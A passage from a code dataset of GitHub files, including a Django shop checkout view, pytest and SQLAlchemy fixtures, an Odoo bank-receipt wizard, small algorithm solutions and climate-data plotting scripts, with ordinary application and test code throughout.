Product.objects.filter(pk__in=self.cart.cart_items.keys())\n data['cart'] = {product: self.cart.cart_items[str(product.pk)] for product in products}\n data['totalPrice'] = sum([product.price * self.cart.cart_items[str(product.pk)] for product in products])\n\n data['delivery_js'] = [DeliveryMethod[key].values[0].get_script() for key in DeliveryMethod.__members__.keys()\n if DeliveryMethod[key].values[0].get_script() != \"\"]\n\n return data\n\n def form_valid(self, form):\n order: Order = form.save(commit=False)\n products = Product.objects.filter(pk__in=self.cart.cart_items.keys())\n\n for product in products:\n product.count -= self.cart.cart_items[str(product.pk)]\n product.save()\n\n order.cost = sum([product.price * self.cart.cart_items[str(product.pk)] for product in products])\n # saving delivery_data to track field. 
It will later be processed into the document track number\n        order.track = form.cleaned_data['delivery_data']\n\n        order.save()\n\n        OrderItem.objects.bulk_create([\n            OrderItem(order=order, product=products.get(id=key), count=value)\n            for key, value in self.cart.cart_items.items()])\n\n        settings: OrderSettings = OrderSettings.get_solo()\n\n        items: str = \"\"\n\n        for product in products:\n            items += settings.item_format.format(\n                url=\"{site}{path}\".format(site=Site.objects.get_current().domain, path=product.get_absolute_url()),\n                name=product.name,\n                image=\"{site}{path}\".format(site=Site.objects.get_current().domain, path=product.get_image()),\n                price=product.price,\n                count=self.cart.cart_items[str(product.pk)],\n                totalPrice=self.cart.cart_items[str(product.pk)] * product.price\n            )\n\n        title: str = settings.new_order_mail_title.format(number=order.pk)\n        message: str = settings.new_order_mail.format(number=order.pk, total_price=order.cost, items=items)\n\n        send_email(order.email, title, message)\n\n        self.cart.clear()\n        return redirect(\"orders:pay\", uuid=order.uuid)\n\n\nclass PaymentView(View):\n\n    @method_decorator(csrf_exempt)\n    def dispatch(self, request, *args, **kwargs):\n        self.order: Order = get_object_or_404(Order, uuid=self.kwargs['uuid'])\n        if self.order.status == OrderStatus.PAYED:\n            return render(request, \"orders/paid.jinja\", {\"object\": self.order})\n        if self.order.status != OrderStatus.NEW:\n            return redirect('products:list')\n\n        self.payment: IPaymentType = PaymentMethod[self.order.payment_service].values[0]\n        return super().dispatch(request, *args, **kwargs)\n\n    def get(self, *args, **kwargs):\n        return self.payment.handle_get(self.order, self.request)\n\n    def post(self, *args, **kwargs):\n        return self.payment.handle_post(self.order, self.request)\n","repo_name":"demirug/ECommerce","sub_path":"apps/orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37517376559","text":"from collections import deque\nclass MovingAverage:\n\n    def __init__(self, size: int):\n        self.windowSize = size\n        self.values = deque([])\n\n    def next(self, val: int) -> float:\n        self.values.append(val)\n        if len(self.values) > self.windowSize:\n            self.values.popleft()\n        return sum(self.values) / len(self.values)\n\n\n\n# Your MovingAverage object will be instantiated and called as such:\n# obj = MovingAverage(size)\n# param_1 = obj.next(val)","repo_name":"ikang9712/LeetCodeTracker","sub_path":"0346-moving-average-from-data-stream/0346-moving-average-from-data-stream.py","file_name":"0346-moving-average-from-data-stream.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"70990419564","text":"from PIL import Image, ImageDraw, ImageFont\nimport os\n\ncolorPalletes = dict()\n\n# From https://sashamaps.net/docs/tools/20-colors/\ncolorPalletes['original'] = {\n    'Button': (255, 255, 25),\n    'Label': (60, 180, 75),\n    'Screen': (230, 25, 75),\n    'TextBox': (0, 130, 200),\n    'Image': (145, 30, 180),\n    'CheckBox': (245, 130, 48),\n    'ListPicker': (250, 190, 212),\n    'Switch': (70, 240, 240),\n    'Slider': (240, 50, 230),\n    'Map': (210, 245, 60)\n}\n\n# From https://bookdown.org/hneth/ds4psy/D-2-apx-colors-essentials.html + suggestion from Nathalie\ncolorPalletes['pal1'] = {\n    'Button': \"#999999\",\n    'Label': \"#E69F00\",\n    'Screen': \"#56B4E9\",\n    'TextBox': \"#009E73\",\n    'Image': 
\"#F0E442\",\n 'CheckBox': \"#0072B2\",\n 'ListPicker': \"#D55E00\",\n 'Switch': \"#CC79A7\",\n 'Slider': \"#8C74D2\",\n 'Map': \"#847848\"\n}\ncolorPalletes['pal2'] = {\n 'Button': \"#000000\",\n 'Label': \"#E69F00\",\n 'Screen': \"#56B4E9\",\n 'TextBox': \"#009E73\",\n 'Image': \"#F0E442\",\n 'CheckBox': \"#0072B2\",\n 'ListPicker': \"#D55E00\",\n 'Switch': \"#CC79A7\",\n 'Slider': \"#8C74D2\",\n 'Map': \"#847848\"\n}\n\n# From https://medialab.github.io/iwanthue/\ncolorPalletes['iwanthue'] = {\n 'Button': \"#54de45\",\n 'Label': \"#7320c0\",\n 'Screen': \"#9fe633\",\n 'TextBox': \"#332ebb\",\n 'Image': \"#e7e027\",\n 'CheckBox': \"#6255ea\",\n 'ListPicker': \"#ec3e22\",\n 'Switch': \"#ab4bea\",\n 'Slider': \"#f2279f\",\n 'Map': \"#d43dd3\"\n}\n\n# From https://mokole.com/palette.html\ncolorPalletes['mokole'] = {\n 'Button': \"#006400\",\n 'Label': \"#00008b\",\n 'Screen': \"#b03060\",\n 'TextBox': \"#ff0000\",\n 'Image': \"#ffd700\",\n 'CheckBox': \"#7fff00\",\n 'ListPicker': \"#00ffff\",\n 'Switch': \"#ff00ff\",\n 'Slider': \"#6495ed\",\n 'Map': \"#ffdab9\"\n}\n\n# https://seaborn.pydata.org/generated/seaborn.color_palette.html\n'''\nOriginal code:\n import seaborn as sns\n snsCollorPallete = sns.color_palette(\"bright\")\n newCollorPallete = list()\n for color in snsCollorPallete:\n newColor = tuple(int(value * 255) for value in color)\n newCollorPallete.append(newColor)\n for color in newCollorPallete:\n print(color)\n colorPalletes['seaborn'] = {\n 'Button': newCollorPallete[0],\n 'Label': newCollorPallete[1],\n 'Screen': newCollorPallete[2],\n 'TextBox': newCollorPallete[3],\n 'Image': newCollorPallete[4],\n 'CheckBox': newCollorPallete[5],\n 'ListPicker': newCollorPallete[6],\n 'Switch': newCollorPallete[7],\n 'Slider': newCollorPallete[8],\n 'Map': newCollorPallete[9]\n }\n'''\ncolorPalletes['seaborn'] = {\n 'Button': (2, 62, 255),\n 'Label': (255, 124, 0),\n 'Screen': (26, 201, 56),\n 'TextBox': (232, 0, 11),\n 'Image': (139, 43, 226),\n 'CheckBox': (159, 72, 0),\n 'ListPicker': (241, 76, 193),\n 'Switch': (163, 163, 163),\n 'Slider': (255, 196, 0),\n 'Map': (0, 215, 255)\n}\n\n# Select color pallete\ncolorDict = colorPalletes['seaborn']\n# Get font\nfont = ImageFont.truetype(\"/usr/share/fonts/truetype/freefont/FreeSansBold.ttf\", 35)\n# Options:\ntext_enable = True\ntext_border_enable = False\n\n\ndef getCoords(component):\n return [(component.x1, component.y1), (component.x2, component.y2)]\n\ndef get_label(component):\n return component.label\n\ndef translate_label(label, language='en'):\n return label\n \n\ndef generate_preview(\n image_path,\n components,\n language='en',\n show = False\n):\n image = Image.open(image_path)\n image = image.resize((720, 1280))\n image = image.convert('RGB')\n\n draw = ImageDraw.Draw(image)\n\n for component in components:\n # Get coordinates and label\n [(x0, y0), (x1, y1)] = getCoords(component=component)\n label = get_label(component)\n\n # Draw multiple rectangles for thicker borders\n draw.rectangle([(x0, y0), (x1, y1)], fill=None,\n outline=colorDict[label])\n for delta in [0, 1, -1, 2, -2]:\n draw.rectangle([(x0 - delta, y0 - delta), (x1 + delta, y1 + delta)],\n fill=None, outline=colorDict[label])\n\n # Draw text\n \n text_y_compensation = -37\n text_x_compensation = 0\n #text_color = (255, 255, 255, 255)\n text_color = colorDict[label]\n text_border_color = (255, 255, 255, 255)\n\n label_text = translate_label(label, language='en')\n if text_enable:\n if text_border_enable:\n for delta in [1, -1, ]:\n draw.text((x0 + 
text_x_compensation + delta, y0 + text_y_compensation),\n label_text, font=font, fill=text_border_color)\n draw.text((x0 + text_x_compensation, y0 + text_y_compensation +\n delta), label_text, font=font, fill=text_border_color)\n draw.text((x0 + text_x_compensation + delta, y0 + text_y_compensation +\n delta), label_text, font=font, fill=text_border_color)\n draw.text((x0 + text_x_compensation, y0 + text_y_compensation),\n label_text, font=font, fill=text_color)\n if show:\n image.show()\n return image\n\ndef save_preview(\n image_path,\n components,\n destination_path,\n language='en',\n show = False\n):\n image = generate_preview(image_path=image_path, components=components, language=language, show=show)\n image.save(destination_path)","repo_name":"Dsbaule/Sketch2AIA","sub_path":"src/AIAGeneration/Draw.py","file_name":"Draw.py","file_ext":"py","file_size_in_byte":5424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"16366614024","text":"from unittest.mock import Mock\n\nfrom tests.testcase import TestCase\nfrom hypernode_api_python.client import (\n HypernodeAPIPython,\n)\n\n\nclass TestGetAppInfoOr404(TestCase):\n def setUp(self):\n self.client = HypernodeAPIPython(token=\"mytoken\")\n self.mock_request = Mock()\n self.client.requests = self.mock_request\n\n def test_calls_hypernode_api_app_endpoint_with_app_name(self):\n self.client.get_app_info_or_404(\"yourhypernodeappname\")\n\n self.mock_request.assert_called_once_with(\n \"GET\", \"/v2/app/yourhypernodeappname/?destroyed=false\"\n )\n\n def test_raises_if_hypernode_api_returns_404(self):\n response = Mock()\n response.status_code = 404\n self.mock_request.return_value = response\n\n with self.assertRaises(RuntimeError):\n self.client.get_app_info_or_404(\"yourhypernodeappname\")\n\n def test_returns_response_json_if_hypernode_api_returns_app_info(self):\n response = Mock()\n response.status_code = 200\n self.mock_request.return_value = response\n\n ret = self.client.get_app_info_or_404(\"yourhypernodeappname\")\n\n self.assertEqual(ret, self.mock_request.return_value)\n","repo_name":"ByteInternet/hypernode-api-python","sub_path":"tests/client/test_get_app_info_or_404.py","file_name":"test_get_app_info_or_404.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"19"} +{"seq_id":"74221856362","text":"import pytest\nimport uuid\nfrom sqlalchemy import create_engine, text as sa_text\nfrom sqlalchemy.orm import Session\nfrom models.base_model import BaseModel\nimport importlib\nfrom tests.datasets.generic import DATA_SET\nfrom settings import settings\nfrom sqlalchemy_utils import create_database, drop_database\nfrom sqlalchemy.orm import sessionmaker\nfrom settings import settings\nfrom models.base_model import BaseModel\n\ndef unzip_data_set(data_set):\n \"\"\"\n Reduce any format of data set input to an iterator of dict { model: data }\n\n Args:\n data_set: any type of object.\n \"\"\"\n if isinstance(data_set, (list, tuple)):\n for entry in data_set:\n yield from unzip_data_set(entry)\n\n elif isinstance(data_set, str):\n mod = importlib.import_module(f\"tests.datasets.{data_set}\")\n yield from unzip_data_set(mod.DATA_SET)\n\n elif isinstance(data_set, dict):\n yield data_set\n\n@pytest.fixture(name=\"db\")\ndef fixture_db(request):\n \"\"\"\n Function scoped database which will create a database from shared connection\n The database can be passed a custom dataset\n\n IMPORTANT:\n This 
is the default fixture to use when testing write operations\n \"\"\"\n db_name = \"service_backend_test_\" + str(uuid.uuid4()).replace(\"-\", \"_\")\n # text = f\"CREATE DATABASE {db_name} ENCODING 'utf8' TEMPLATE 'template1'\"\n db_url = f'postgresql://test:test@localhost:5434/{db_name}'\n settings.SQLALCHEMY_DATABASE_URL = db_url\n create_database(db_url)\n engine = create_engine(\n url=db_url,\n echo=False,\n future=True\n )\n try:\n # session.execute(sa_text(text))\n BaseModel.metadata.drop_all(engine)\n BaseModel.metadata.create_all(engine)\n with Session(engine) as session:\n dataset = [DATA_SET]\n if hasattr(request, \"param\"):\n dataset = request.param\n dataset = unzip_data_set(dataset)\n signed = []\n for model_rows in dataset:\n if model_rows not in signed:\n for model, rows in model_rows.items():\n entries = []\n for row in rows:\n new_entry = model(**row)\n entries.append(new_entry)\n session.add_all(entries)\n session.flush()\n signed.append(model_rows)\n session.commit()\n\n with Session(engine) as session:\n yield session\n finally:\n drop_database(db_url)\n # with engine.connect() as conn:\n # version = conn.dialect.server_version_info\n # pid_column = \"pid\" if (version >= (9, 2)) else \"procpid\"\n # text = f\"\"\"\n # SELECT pg_terminate_backend(pg_stat_activity.{pid_column})\n # FROM pg_stat_activity\n # WHERE pg_stat_activity.datname = '{db_name}'\n # AND {pid_column} <> pg_backend_pid();\n # \"\"\"\n # conn.execute(sa_text(text))\n\n # # Drop the database.\n # with engine.connect() as conn:\n # text = f\"DROP DATABASE {db_name}\"\n # conn.execute(sa_text(text))\n\n\nclass TestBlog:\n def setup_class(self):\n engine = create_engine(\n settings.SQLALCHEMY_DATABASE_URL, echo=True, future=True\n )\n SessionLocal = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n BaseModel.metadata.create_all(engine)\n self.session = Session()\n self.valid_author = Author(\n firstname=\"Ezzeddin\",\n lastname=\"Aybak\",\n email=\"aybak_email@gmail.com\"\n )\n\n def teardown_class(self):\n self.session.rollback()\n self.session.close()\n\n@pytest.fixture(scope=\"module\")\ndef db_session():\n engine = create_engine(\n settings.SQLALCHEMY_DATABASE_URL, echo=True, future=True\n )\n # session = sessionmaker(autocommit=False, autoflush=False, bind=engine)\n BaseModel.metadata.create_all(engine)\n session = Session()\n yield session\n session.rollback()\n session.close()","repo_name":"ThibaultRizzo/base-ramses","sub_path":"tests/fixtures/database_fixtures.py","file_name":"database_fixtures.py","file_ext":"py","file_size_in_byte":4170,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"40397188426","text":"from openerp.osv import fields, orm\n\nclass emissione_riba(orm.TransientModel):\n \n _inherit = \"riba.emissione\"\n \n def _vaidate_partner_bank(self, cr, uid, ids, partner, context=None):\n if not partner.bank_ids:\n raise orm.except_orm('Attenzione!', 'Il cliente %s non ha la banca!!!' 
% partner.name)\n # At least one valid bank\n one_valid_bank =False\n #for bank in self.pool.get('account.move.line').browse(cr, uid, partner.bank_ids):\n for bank in partner.bank_ids:\n if bank.state == \"iban\":\n #iban = bank.acc_number\n #iban = iban.replace(\" \",\"\")\n one_valid_bank = True\n bank_ok = bank\n break \n if bank.state == \"bank\":\n account = bank.acc_number\n if bank.bank_cab and bank.bank_abi:\n one_valid_bank = True\n bank_ok = bank\n break\n if not one_valid_bank:\n raise orm.except_orm('Attenzione!', 'Il cliente %s con banca senza iban/abi-cab corretta!!!' % partner.name)\n \n return bank_ok \n \n \n def crea_distinta(self, cr, uid, ids, context=None):\n if context is None:\n context = {}\n def create_rdl(conta, bank_id, rd_id, date_maturity, partner_id, acceptance_account_id):\n rdl = {\n 'sequence' : conta,\n 'bank_id' : bank_id,\n 'distinta_id': rd_id,\n 'due_date' : date_maturity,\n 'partner_id' : partner_id,\n 'state': 'draft',\n 'acceptance_account_id': acceptance_account_id,\n }\n return riba_distinta_line.create(cr, uid, rdl, context=context)\n \n \"\"\"\n Qui creiamo la distinta\n \"\"\"\n wizard_obj = self.browse(cr,uid,ids)[0]\n active_ids = context and context.get('active_ids', [])\n riba_distinta = self.pool.get('riba.distinta')\n riba_distinta_line = self.pool.get('riba.distinta.line')\n riba_distinta_move_line = self.pool.get('riba.distinta.move.line')\n move_line_obj = self.pool.get('account.move.line')\n\n # create distinta\n rd = {\n 'name': self.pool.get('ir.sequence').get(cr, uid, 'seq.riba.distinta'),\n 'config': wizard_obj.configurazione.id,\n 'user_id': uid,\n 'date_created': fields.date.context_today(self,cr,uid,context),\n }\n rd_id = riba_distinta.create(cr, uid, rd)\n \n # group by partner and due date\n grouped_lines = {}\n move_line_ids = move_line_obj.search(cr, uid, [('id', 'in', active_ids)], context=context)\n for move_line in move_line_obj.browse(cr, uid, move_line_ids, context=context):\n if move_line.partner_id.group_riba:\n if not grouped_lines.get(\n (move_line.partner_id.id, move_line.date_maturity), False):\n grouped_lines[(move_line.partner_id.id, move_line.date_maturity)] = []\n grouped_lines[(move_line.partner_id.id, move_line.date_maturity)].append(\n move_line)\n \n # create lines\n conta = 1\n \n for move_line in move_line_obj.browse(cr, uid, move_line_ids, context=context):\n #if move_line.partner_id.bank_ids:\n # bank_id = move_line.partner_id.bank_ids[0]\n #else:\n # raise orm.except_orm('Attenzione!', 'Il cliente %s non ha la banca!!!' 
% move_line.partner_id.name)\n partner = move_line.partner_id\n bank_id = self._vaidate_partner_bank(cr, uid, ids, partner, context)\n \n if move_line.partner_id.group_riba:\n for key in grouped_lines:\n if key[0] == move_line.partner_id.id and key[1] == move_line.date_maturity:\n rdl_id = create_rdl(conta, bank_id.id, rd_id, move_line.date_maturity, move_line.partner_id.id, wizard_obj.configurazione.acceptance_account_id.id)\n total = 0.0\n invoice_date_group = ''\n for grouped_line in grouped_lines[key]:\n riba_distinta_move_line.create(cr, uid, {\n 'riba_line_id': rdl_id,\n 'amount': grouped_line.amount_residual,\n 'amount_origin': grouped_line.debit,\n 'move_line_id': grouped_line.id,\n }, context=context)\n del grouped_lines[key]\n break\n else:\n rdl_id = create_rdl(conta, bank_id.id, rd_id, move_line.date_maturity, move_line.partner_id.id, wizard_obj.configurazione.acceptance_account_id.id)\n riba_distinta_move_line.create(cr, uid, {\n 'riba_line_id': rdl_id,\n 'amount': move_line.amount_residual,\n 'amount_origin': move_line.debit,\n 'move_line_id': move_line.id,\n }, context=context)\n \n conta+=1\n \n # ----- show distinta form\n mod_obj = self.pool.get('ir.model.data')\n res = mod_obj.get_object_reference(cr, uid, 'l10n_it_ricevute_bancarie', 'view_distinta_riba_form')\n res_id = res and res[1] or False,\n return {\n 'name': 'Distinta',\n 'view_type': 'form',\n 'view_mode': 'form',\n 'view_id': res_id,\n 'res_model': 'riba.distinta',\n 'type': 'ir.actions.act_window',\n #'nodestroy': True,\n 'target': 'current',\n 'res_id': rd_id or False,\n }\n\n","repo_name":"alessandrocamilli/7-openforce-addons","sub_path":"openforce_riba_extended/wizard/wizard_emissione_riba.py","file_name":"wizard_emissione_riba.py","file_ext":"py","file_size_in_byte":5824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"73086973802","text":"import pytest\nfrom faker import Faker\n\nfrom django.urls import reverse\n\nfaker = Faker()\n\npytestmark = pytest.mark.django_db\n\n\n@pytest.mark.parametrize(\"name, status_code\", [(\"public\", 201), (\"NOT_A_VALID_OWNER\", 400)])\ndef test_create_owner(\n api_client,\n name,\n credential,\n status_code,\n):\n url = reverse(\"owners-list\")\n\n data = {\n \"name\": name,\n \"credential\": credential.id,\n }\n response = api_client.post(url, data)\n\n assert response.status_code == status_code, response.data\n\n\ndef test_retrieve_owner(api_client, owner):\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.get(url)\n\n assert response.status_code == 200, response.data\n\n\ndef test_list_owners(api_client, owner_factory):\n url = reverse(\"owners-list\")\n owner_factory.create_batch(3)\n\n response = api_client.get(url)\n\n assert response.status_code == 200, response.data\n assert len(response.data) == 3\n\n\ndef test_filter_owners_by_credential(\n api_client,\n credential_factory,\n owner_factory,\n):\n url = reverse(\"owners-list\")\n\n first_credential, second_credential = credential_factory.create_batch(2)\n first_credential_owners = owner_factory.create_batch(3, credential=first_credential)\n owner_factory.create(credential=second_credential)\n\n response = api_client.get(url, {\"credential\": first_credential.id})\n\n assert response.status_code == 200, response.data\n assert {owner_data[\"id\"] for owner_data in response.json()} == {owner.id for owner in first_credential_owners}\n\n\n@pytest.mark.parametrize(\"name, status_code\", [(\"public\", 200), 
(\"NOT_A_VALID_OWNER\", 400)])\ndef test_update_owner(\n api_client,\n owner,\n name,\n status_code,\n):\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n data = {\"name\": name}\n response = api_client.patch(url, data)\n\n assert response.status_code == status_code, response.data\n\n\ndef test_delete_owner(api_client, owner):\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.delete(url)\n\n assert response.status_code == 204, response.data\n\n\ndef test_delete_owner_conflict_resource(api_client, owner, resource_factory):\n resource_factory.create(primary_key_owner=owner)\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.delete(url)\n\n assert response.status_code == 409, response.data\n\n\ndef test_delete_owner_conflict_column(api_client, owner, column_factory):\n column_factory.create(owner=owner)\n url = reverse(\"owners-detail\", kwargs={\"pk\": owner.id})\n\n response = api_client.delete(url)\n\n assert response.status_code == 409, response.data\n","repo_name":"arkhn/fhir-river","sub_path":"tests/pyrog/api/test_owner.py","file_name":"test_owner.py","file_ext":"py","file_size_in_byte":2684,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"19"} +{"seq_id":"29965537733","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 22 17:50:23 2020\n\n@author: isabellatobias\n\"\"\"\n#Code for data analysis using the Simpson rule\n\n#Imports the required libraries\nfrom __future__ import division\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\n#Files with default values\ndata = pd.read_excel('default_values.xlsx', names=['TIME', 'Default'])\ndata.head()\n\n#File with the tested samples\ndata2 = pd.read_excel('tested_values.xlsx', names=['TIME', 'Tested'])\ndata2.head()\n\n#Values chosen from the files [lines,columns]\n#We divided our values for 1000 ou 10000 because they were too big \nTime = data.iloc[46:, 0].values/1000\nDefault = data.iloc[46:, 2].values/100000\nTested = data2.iloc[11:, 1].values/100000\n\n#Now we use the Simpson's Rule\n#We are interested in the diference between the integrals\nIntegral = integrate.simps(Tested, Time)-integrate.simps(Default, Time)\n\n#Figure size\n#Plot the integral\nplt.figure(figsize = (15,10))\nplt.scatter(Time,Integral, color='b', label='Primeiro Momento')\n\n#Name the x axis\n#Name the y-axis\n#Positions subtitles\n#Place the title\n#Place grid\nplt.xlabel('Date')\nplt.ylabel('Integral')\nplt.legend(loc='best')\nplt.title(\"Cicle\")\nplt.grid(True)\n\n#Displays the graph\nplt.show()\n","repo_name":"tobiasisabella/analysis-by-simpson-integral-python","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"4253347655","text":"class Solution:\n def exist(self, board: List[List[str]], word: str) -> bool:\n res = False\n directions = [(0,1), (0,-1), (1,0), (-1,0)]\n \n def dfs(word, x, y, prevDirection, visited):\n nonlocal res\n if word == \"\":\n res = True\n return\n if (x,y) in visited:\n return\n if x < 0 or x >= len(board[0]) or y < 0 or y >= len(board):\n return\n if word[0] != board[y][x]:\n return\n else:\n for direction in directions:\n if (-prevDirection[0], -prevDirection[1]) != direction:\n visited.add((x, y))\n dfs(word[1:], x+direction[0], y+direction[1], direction, visited.copy())\n\n count = 
defaultdict(int, sum(map(Counter, board), Counter()))\n if count[word[0]] > count[word[-1]]:\n word = word[::-1]\n\n for y in range(len(board)):\n for x in range(len(board[0])):\n visited = set()\n dfs(word, x, y, (0,0), visited)\n if res:\n return res\n\n return res\n","repo_name":"kapforty/leetcode","sub_path":"python3/79.py","file_name":"79.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"21936181110","text":"#!/usr/bin/env python3\nimport sys\n#sys.path.append(\"/home/anthony/Documents/Doctorat/PROD/ML_Climate/2-Programs\")\nsys.path.append(\"/home/anthony/Documents/Doctorat/PROD/ML_Climate/3-Test/7-Moist_Pantanal/Programs\")\nimport cartopy\nimport cartopy.crs as ccrs\nimport matplotlib.pyplot as plt\nfrom netCDF4 import Dataset as NetCDFFile\nfrom netCDF4 import num2date\nimport numpy as np\nimport numpy.ma as ma\nimport matplotlib\nimport matplotlib.gridspec as gridspec\nimport pandas as pd\nimport cartopy.io.shapereader as shpreader\n\n\nfrom class_data_ER5moist import input_ML\nfrom netcdf_output import output_SOM_NetCDF_moistconv\nfrom numpy import linalg as LA\n\n##########################\n\nmoistdir = \"./Originals/PANTANAL_vimd_single-level_JFD_1980-2010_daily.nc\"\ndout = \"./output.nc\"\n\ndgraphs = \"./Graphics/\"\n\n##########################\n\nclass output:\n def __init__(self, output):\n self.nc = NetCDFFile(output, \"r\")\n self.lon = self.nc.variables[\"lon\"][:]\n self.lat = self.nc.variables[\"lat\"][:]\n time = self.nc.variables[\"time\"]\n self.dtime = num2date(time[:], time.units)\n self.xdim = len(self.nc.variables[\"m\"][:])\n self.ydim = len(self.nc.variables[\"n\"][:])\n self.ndim = self.ydim ; self.mdim = self.xdim\n \n self.ml = np.arange(0.5,6.5)\n \n self.moistconv_cluster = self.nc.variables[\"moistconv\"][:] # n,m,lat, lon\n self.mapvect_m = self.nc.variables[\"mapvect_m\"][:] # time\n self.mapvect_n = self.nc.variables[\"mapvect_n\"][:] # time\n \n def koho_map(self):\n Koho = np.zeros((self.ydim,self.xdim))\n \n for koho_vect_x,koho_vect_y in zip(self.mapvect_m, self.mapvect_n):\n Koho[int(koho_vect_y),int(koho_vect_x)] +=1\n # y = n = vertical \n self.Koho = Koho\n \n def koho_filter(self, filter):\n Koho = np.zeros((self.ydim,self.xdim))\n \n for fil, koho_vect_x,koho_vect_y in zip(filter, self.mapvect_m, self.mapvect_n):\n if fil==1:\n Koho[int(koho_vect_y),int(koho_vect_x)] +=1\n # y = n = vertical \n return Koho\n \n def plot_koho(self, koho, title, namefig):\n plt.figure(figsize= (6,5)) \n plt.pcolor(self.ml, self.ml, np.flip(koho, axis = 0))\n plt.xticks(np.arange(1,6))\n plt.yticks(np.arange(1,6), np.flip(np.arange(1,6)))\n plt.colorbar()\n plt.title(title)\n plt.savefig(dgraphs + namefig)\n plt.close()\n \n\n########################## \n \nmoistconv = input_ML(moistdir).moistconv.data\nclu = output(dout)\nclu.koho_map()\n\n##########################\n\n# Plot distribution cluster\nclu.plot_koho(clu.Koho, \"Distribution Kohonen map\", \"1-Distribution_Kohonen_map.png\")\n\n##########################\n \ndef plot_map(gs, col, row, data, title):\n plt.subplot(gs[row, col], projection=ccrs.PlateCarree())\n ax = plt.gca()\n ax.add_feature(cartopy.feature.BORDERS)\n ax.add_feature(cartopy.feature.COASTLINE)\n cbar = ax.contourf(clu.lon, clu.lat, data, levels = np.arange(-3,2.25,0.25), vmin = -1.5, vmax = 1.)\n ax.ylabel = str(col+1)\n #plt.title(title)\n plt.colorbar(cbar)\n #return cbar\n\nfig = plt.figure(figsize= (10,10)) \ngs = 
matplotlib.gridspec.GridSpec(5, 5)\nfor n in range(0,5):\n    for m in range(0,5):\n        plot_map(gs, m, n, clu.moistconv_cluster[n,m,:,:], \"n = {0} / m = {1}\".format(n+1,m+1))\n        \n        ax = plt.gca()\n        if m ==0:\n            ax.text(-0.2, 0.5, n+1, va='bottom', ha='center',\n                    rotation='horizontal', rotation_mode='anchor',\n                    transform=ax.transAxes, fontsize = 20)\n        if n ==2: \n            ax.text(-0.5, 0.5, \"n\", va='bottom', ha='center',\n                    rotation='horizontal', rotation_mode='anchor',\n                    transform=ax.transAxes, fontsize = 30) \n        if n == 0:\n            ax.text(0.5, 1.1, m+1, va='bottom', ha='center',\n                    rotation='horizontal', rotation_mode='anchor',\n                    transform=ax.transAxes, fontsize = 20)\n        if m ==2:\n            ax.text(0.5, 1.3, \"m\", va='bottom', ha='center',\n                    rotation='horizontal', rotation_mode='anchor',\n                    transform=ax.transAxes, fontsize = 30)\n\nplt.savefig(dgraphs + \"2-Clusters.png\")\nplt.close()\n\n#Vertically integrated moisture divergence\n# larger value = more divergent -> less favorable conditions for precipitation\n# larger absolute value -> more moisture involved\n\n\n##########################\n#\n\"\"\"\nLevy, M. C. (2017). \nRain gauge data for the Brazilian rainforest-savanna transition zone, \nHydroShare, http://www.hydroshare.org/resource/9ee10ae69e074f819f023df73e15c4e1\n\"\"\"\n\n# Prepare rainfall dataset\nrain_data = \"./Originals/rain_data.csv\"\ndfrain = pd.read_csv(rain_data)\nSUM = (dfrain['month'] == 12) | (dfrain['month'] == 1) | (dfrain['month'] == 2)\ndfrain = dfrain[SUM]\nYEAR = (dfrain['year'] >= 1980) & (dfrain['year'] < 2011)\ndfrain = dfrain[YEAR]\n\n#site = np.unique(dfrain['site'].to_numpy())\n\n##########\n\nD= {}\nD[2157004] = [\"Porto Murtinho\",-21.7014,-57.8917]\nD[1556004] = [\"Cuiabá\", -15.6333, -56.1]\nD[1756001] = [\"SÃO JOSÉ DO PIQUIRI\",-17.2914 , -56.3847]\nD[1755003] = [\"SÃO JERÔNIMO\", -17.2017, -56.0086]\nD[1656003] = [\"SÃO JOSÉ DO BORIRÉU\", -16.9211, -56.2236]\nD[1657003] = [\"CÁCERES\"\t, -16.0817, -57.6942]\nD[1654000] = [\"RONDONÓPOLIS\", -16.4711, -54.6561]\nD[1455002] = [\"COIMBRA - PORTO DE CIMA\", -14.8833, -55.8667]\nD[1957002] = [\"CORUMBÁ (ETA)\", -19.0058, -57.6019]\nD[1957006] = [\"PORTO ESPERANÇA\",-19.6008, -57.4381]\nD[1957004] = [\"FORTE COIMBRA\", -19.9186, -57.7894]\nD[1957003] = [\"PORTO DA MANGA\", -19.2583, -57.2353]\nD[1756003] = [\"PORTO DO ALEGRE\", -17.6233, -56.965]\nD[1854005] = [\"COXIM\", -18.5, -54.9333]\nD[2056001] = [\"MIRANDA\", -20.2408, -56.3958]\n#D[] = \"\"\n\n# Integrate more stations and group them by zone\n# Take the regions (cf. HydroBASINS, Thienan) then check whether each point is contained in a zone\n\ndef plot_locst(ncol, nrow, ind, stnum):\n    ax = plt.subplot(ncol, nrow, ind, projection=ccrs.PlateCarree())\n    ax.set_extent([-62,-52,-23,-14])\n\n    # BORDERS\n    ax.add_feature(cartopy.feature.BORDERS)\n    \"\"\"\n    geo_reg_shp = shpreader.natural_earth(resolution='50m', category='cultural',\n                                            